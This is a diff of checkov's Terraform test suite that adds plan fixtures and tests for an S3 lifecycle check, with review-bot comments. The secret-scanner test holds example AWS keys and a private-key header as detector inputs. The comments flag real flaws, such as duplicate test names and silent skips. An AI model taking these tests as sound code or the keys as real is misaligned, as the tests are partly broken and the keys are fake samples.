@@ -0,0 +1,183 @@ +{ + "format_version": "1.2", + "terraform_version": "1.5.7", + "planned_values": { + "root_module": { + "resources": [ + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 7 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": ["my_tag"] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + "timeouts": null + }, + "sensitive_values": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + } + } + ] + } + }, + "resource_changes": [ + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "update" + ], + "before": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 6 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": [] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + 
"timeouts": null + }, + "after": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 7 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": [] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + "timeouts": null + }, + "after_unknown": {}, + "before_sensitive": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + }, + "after_sensitive": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json new file mode 100644 index 00000000000..abcc4e658f9 --- /dev/null +++ b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json 
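Review bot: This fixture describes the same resource twice with different filter contents: under `planned_values` the lifecycle rule has `"tag": ["my_tag"]`, while `resource_changes[0].change.after` has `"tag": []`. Which of the two views the plan runner evaluates is not visible here, but the success fixture that follows appears to differ from this one only in that `planned_values` tag entry, so the pass/fail distinction the new test relies on hinges on that choice. Making both views agree (the populated tag in `after` as well) would keep the fixture unambiguous regardless of which view is read.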
@@ -0,0 +1,183 @@ +{ + "format_version": "1.2", + "terraform_version": "1.5.7", + "planned_values": { + "root_module": { + "resources": [ + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 7 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": [] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + "timeouts": null + }, + "sensitive_values": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + } + } + ] + } + }, + "resource_changes": [ + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "update" + ], + "before": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 6 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": [] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + 
"timeouts": null + }, + "after": { + "bucket": "my_bucket", + "expected_bucket_owner": "", + "id": "the_id", + "rule": [ + { + "abort_incomplete_multipart_upload": [ + { + "days_after_initiation": 7 + } + ], + "expiration": [], + "filter": [ + { + "and": [], + "object_size_greater_than": "", + "object_size_less_than": "", + "prefix": "", + "tag": [] + } + ], + "id": "failed-uploads", + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "prefix": "", + "status": "Enabled", + "transition": [] + } + ], + "timeouts": null + }, + "after_unknown": {}, + "before_sensitive": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + }, + "after_sensitive": { + "rule": [ + { + "abort_incomplete_multipart_upload": [ + {} + ], + "expiration": [], + "filter": [ + { + "and": [], + "tag": [] + } + ], + "noncurrent_version_expiration": [], + "noncurrent_version_transition": [], + "transition": [] + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json b/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json index b33a141d549..3264fe8ec74 100644 --- a/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json +++ b/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json @@ -186,7 +186,6 @@ "grant":true, "hosted_zone_id":true, "id":true, - "lifecycle_rule":true, "logging":true, "object_lock_configuration":true, "object_lock_enabled":true, @@ -264,7 +263,6 @@ "grant":true, "hosted_zone_id":true, "id":true, - "lifecycle_rule":true, "logging":true, "object_lock_configuration":true, "object_lock_enabled":true, 
diff --git a/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json b/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json index f3540a6b8ea..82d2e13e1b7 100644 --- a/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json +++ b/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json @@ -1816,10 +1816,6 @@ "default": null, "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide." }, - "putin_khuylo": { - "default": true, - "description": "Do you agree that Putin doesn't respect Ukrainian sovereignty and territorial integrity? More info: https://en.wikipedia.org/wiki/Putin_khuylo!" - }, "replication_configuration": { "default": {}, "description": "Map containing cross-region replication configuration." diff --git a/tests/terraform/runner/test_plan_runner.py b/tests/terraform/runner/test_plan_runner.py index 9733389c495..b473d9cdccf 100644 --- a/tests/terraform/runner/test_plan_runner.py +++ b/tests/terraform/runner/test_plan_runner.py 
@@ -68,6 +68,26 @@ def test_runner_two_checks_only(self):
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 3)
+ def test_tf_plan_filtered_rule(self):
+ if not self.db_connector == RustworkxConnector:
+ return
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ valid_plan_path = current_dir + "/resources/plan/tf_plan_filtered_rule_success.json"
+ runner = Runner(db_connector=self.db_connector())
+ checks_allowlist = ['CKV_AWS_300']
+ report = runner.run(files=[valid_plan_path], runner_filter=RunnerFilter(framework=["terraform_plan"], checks=checks_allowlist))
+ assert len(report.passed_checks) == 1
+
+ def test_tf_plan_filtered_rule(self):
+ if not self.db_connector == RustworkxConnector:
+ return
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ valid_plan_path = current_dir + "/resources/plan/tf_plan_filtered_rule_fail.json"
+ runner = Runner(db_connector=self.db_connector())
+ checks_allowlist = ['CKV_AWS_300']
+ report = runner.run(files=[valid_plan_path], runner_filter=RunnerFilter(framework=["terraform_plan"], checks=checks_allowlist))
+ assert len(report.failed_checks) == 1
+
def test_runner_record_severity(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan/tfplan.json"
@@ -256,7 +276,7 @@ def test_plan_runner_with_empty_vpc_connection(self):
self.assertEqual(report.get_exit_code({'soft_fail': False, 'soft_fail_checks': [], 'soft_fail_threshold': None, 'hard_fail_checks': [], 'hard_fail_threshold': None}), 1)
self.assertEqual(report.get_exit_code({'soft_fail': True, 'soft_fail_checks': [], 'soft_fail_threshold': None, 'hard_fail_checks': [], 'hard_fail_threshold': None}), 0)
- self.assertEqual(report.get_summary()["failed"], 106)
+ self.assertEqual(report.get_summary()["failed"], 105)
def test_runner_child_modules(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
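Review bot: Both new methods are named `test_tf_plan_filtered_rule`, so the second definition replaces the first in the class namespace and the success-fixture case (expecting one passed check) is never collected or run; rename them, e.g. `def test_tf_plan_filtered_rule_success(self):` and `def test_tf_plan_filtered_rule_fail(self):`. The `if not self.db_connector == RustworkxConnector: return` guard makes each test report as passed on any other connector; `self.skipTest("requires RustworkxConnector")` (with `is not` for the class comparison) would make the skip visible in the test output. The same silent-return guard is repeated in test_for_each_check in test_runner.py later in this diff.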
@@ -796,6 +816,7 @@ def test_plan_and_tf_combine_graph(self):
assert report.passed_checks[0].file_path.endswith('.json')
assert report.passed_checks[1].file_path.endswith('.json')
+ @mock.patch.dict(os.environ, {'EVAL_TF_PLAN_AFTER_UNKNOWN': 'True'})
def test_plan_and_tf_combine_graph_with_missing_resources(self):
tf_file_path = Path(__file__).parent / "resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json"
repo_path = Path(__file__).parent / "resources/plan_and_tf_combine_graph_with_missing_resources"
diff --git a/tests/terraform/runner/test_runner.py b/tests/terraform/runner/test_runner.py
index 25538f65a0d..05c503a5753 100644
--- a/tests/terraform/runner/test_runner.py
+++ b/tests/terraform/runner/test_runner.py
@@ -154,6 +154,24 @@ def test_py_graph_check(self):
assert 'aws_db_instance.default' in failed_resources
assert 'aws_db_instance.disabled' in failed_resources
+ def test_for_each_check(self):
+ if not self.db_connector == RustworkxConnector:
+ return
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ valid_dir_path = current_dir + "/resources/for_each"
+ runner = Runner(db_connector=self.db_connector())
+ checks_allowlist = ['CKV_AWS_186']
+ report = runner.run(root_folder=valid_dir_path, runner_filter=RunnerFilter(framework=["terraform"], checks=checks_allowlist))
+ report_json = report.get_json()
+ self.assertIsInstance(report_json, str)
+ self.assertIsNotNone(report_json)
+ self.assertIsNotNone(report.get_test_suite())
+ assert len(report.failed_checks) == 2
+ assert len(report.passed_checks) == 0
+ failed_resources = [c.resource for c in report.failed_checks]
+ assert 'module.simple[0].aws_s3_bucket_object.this_file' in failed_resources
+ assert 'module.simple[1].aws_s3_bucket_object.this_file' in failed_resources
+
def test_runner_passing_valid_tf(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
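Review bot: The added `@mock.patch.dict` sets EVAL_TF_PLAN_AFTER_UNKNOWN without saying why test_plan_and_tf_combine_graph_with_missing_resources now depends on it; a one-line comment above the decorator naming which fixture attribute is only resolved under this flag would make the dependency explicit for the next person who touches the fixture. It presumably relates to the `lifecycle_rule` entries removed from `after_unknown` in the matching tfplan.json earlier in this diff, but that link is not stated anywhere. The body of the test continues outside the hunk.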
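Review bot: test_for_each_check runs a fixture named for_each, but the module in resources/for_each/main.tf added in this diff uses `count = 2`, and the asserted addresses `module.simple[0]` / `module.simple[1]` are count-style indexes; either rename the directory and test to reflect `count`, or add a genuine for_each module so the name matches what is exercised. `self.assertIsNotNone(report_json)` directly after `self.assertIsInstance(report_json, str)` is redundant and can be dropped. The silent `return` when the connector is not RustworkxConnector reports the test as passed rather than skipped; `self.skipTest("requires RustworkxConnector")` surfaces it.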
@@ -170,7 +188,7 @@ def test_runner_passing_valid_tf(self): 'hard_fail_threshold': None}), 1) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(9, summary['failed']) + self.assertEqual(10, summary['failed']) self.assertEqual(1, summary['skipped']) self.assertEqual(0, summary["parsing_errors"]) @@ -319,7 +337,7 @@ def test_runner_specific_file(self): # self.assertEqual(report.get_exit_code(), 0) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(5, summary['failed']) + self.assertEqual(6, summary['failed']) self.assertEqual(0, summary["parsing_errors"]) def test_check_ids_dont_collide(self): @@ -393,6 +411,9 @@ def test_no_missing_ids(self): if f'CKV_GCP_{i}' == 'CKV_GCP_5': # CKV_GCP_5 is no longer a valid platform check continue + if f'CKV_GCP_{i}' == 'CKV_GCP_19': + # CKV_GCP_19 involved a configuration which was deprecated by GCP + continue if f'CKV_GCP_{i}' == 'CKV_GCP_67': # CKV_GCP_67 is not deployable anymore https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#protect_node_metadata continue @@ -448,7 +469,7 @@ def test_no_missing_ids(self): for check_list in [aws_checks, gcp_checks, azure_checks]: check_list.sort(reverse=True, key=lambda s: int(s.split('_')[-1])) - for i in range(1, len(aws_checks) + 5): + for i in range(1, len(aws_checks) + 4): if f'CKV2_AWS_{i}' == 'CKV2_AWS_17': # CKV2_AWS_17 was overly keen and those resources it checks are created by default continue 
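Review bot: In the `@@ -448,7 +469,7 @@` hunk the loop bound is lowered from `len(aws_checks) + 5` to `len(aws_checks) + 4` while the following hunk adds another skipped ID (`CKV2_AWS_67`), which looks inverted: each skipped ID is a gap below the highest existing ID, so with k skips the highest ID is `len(aws_checks) + k` and the bound should be `len(aws_checks) + k + 1`. Lowering it means the top IDs are no longer asserted to exist, so a missing or mis-numbered newest check would go unnoticed; the same applies to the azure loop moving from `+ 2` to `+ 1` with `CKV2_AZURE_18` still skipped. If a list can contain an ID more than once that reasoning changes, so please confirm the bounds against the actual highest IDs, and a comment such as `# upper bound = number of skipped IDs + 1` next to each range would make the next bump self-checking. `test_no_missing_ids` starts before these hunks and continues past them.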
@@ -464,12 +485,15 @@ def test_no_missing_ids(self): if f'CKV2_AWS_{i}' == 'CKV2_AWS_26': # Was a test policy continue + if f'CKV2_AWS_{i}' == 'CKV2_AWS_67': + # Too many edge cases for ways to get a KMS key connected to S3 + continue self.assertIn(f'CKV2_AWS_{i}', aws_checks, msg=f'The new AWS violation should have the ID "CKV2_AWS_{i}"') for i in range(1, len(gcp_checks) + 1): self.assertIn(f'CKV2_GCP_{i}', gcp_checks, msg=f'The new GCP violation should have the ID "CKV2_GCP_{i}"') - for i in range(1, len(azure_checks) + 2): + for i in range(1, len(azure_checks) + 1): if f'CKV2_AZURE_{i}' == 'CKV2_AZURE_18': # duplicate of CKV2_AZURE_1 continue @@ -1279,6 +1303,18 @@ def test_resource_ids_nested_modules(self): self.assertEqual(len(resources_ids), 3) self.assertEqual(expected_resources_ids, resources_ids) + def test_list_of_routes(self): + resources_path = os.path.join( + os.path.dirname(os.path.realpath(__file__)), "resources", "list_of_routes") + checks_allow_list = ['CKV2_AWS_44'] + + runner = Runner(db_connector=self.db_connector()) + report = runner.run(root_folder=resources_path, external_checks_dir=None, + runner_filter=RunnerFilter(framework=["terraform"], checks=checks_allow_list)) + + self.assertEqual(len(report.passed_checks), 0) + self.assertEqual(len(report.failed_checks), 1) + def test_resource_values_dont_exist(self): resources_path = os.path.join( os.path.dirname(os.path.realpath(__file__)), "resources", "resource_value_without_var") diff --git a/tests/terraform_json/test_parser.py b/tests/terraform_json/test_parser.py index a822195c616..383f94245e9 100644 --- a/tests/terraform_json/test_parser.py +++ b/tests/terraform_json/test_parser.py @@ -1,4 +1,4 @@ -from checkov.terraform_json.parser import hclify +from checkov.terraform_json.parser import hclify, prepare_definition def test_hclify(): 
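Review bot: `test_list_of_routes` in the `@@ -1279,6 +1303,18 @@` hunk pins only the counts (0 passed, 1 failed), so it cannot tell a reader which resource in the `list_of_routes` fixture is expected to violate `CKV2_AWS_44`, nor distinguish the intended failure from an unrelated one. Adding `self.assertEqual(report.failed_checks[0].resource, '<expected resource id>')` — as `test_for_each_check` does via `failed_resources` — documents the fixture's intent and narrows the assertion.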
@@ -34,3 +34,29 @@ def test_hclify(): } ], } + + +def test_prepare_definition_locals(): + cdk_definition = { + "locals": { + "bucket_name": "example", + "http_endpoint": "disabled", + "__startline__": 1, + "__endline__": 2, + } + } + + # when + tf_definition = prepare_definition(cdk_definition) + + # then + assert tf_definition == { + "locals": [ + { + "bucket_name": ["example"], + "http_endpoint": ["disabled"], + "__startline__": 1, + "__endline__": 2, + } + ] + } diff --git a/tests/unit/test_secrets.py b/tests/unit/test_secrets.py index ba41f491c2f..9c330f867f4 100644 --- a/tests/unit/test_secrets.py +++ b/tests/unit/test_secrets.py @@ -11,7 +11,8 @@ def test_secrets(self): 'AKIAIOSFODNN7EXAMPLE', # checkov:skip=CKV_SECRET_2 test secret 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY', # checkov:skip=CKV_SECRET_6 test secret '-----BEGIN RSA PRIVATE KEY-----\n', # checkov:skip=CKV_SECRET_13 test secret - 'Hello from Bridgecrew' + 'Hello from Bridgecrew', + 'cert-manager.io/secret: org/repo', ] # check that no category checks all
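Review bot: The string `'cert-manager.io/secret: org/repo'` added to the fixture list in tests/unit/test_secrets.py carries no annotation, unlike its neighbours, so it is not clear whether it is meant to be detected or to stay undetected (presumably the latter: an annotation key containing the word "secret" that must not be reported as a false positive). A trailing comment stating the intent, e.g. `'cert-manager.io/secret: org/repo',  # must not be reported: annotation key, not a credential`, keeps the fixture self-explanatory if the assertion below changes. `test_secrets` continues past the hunk.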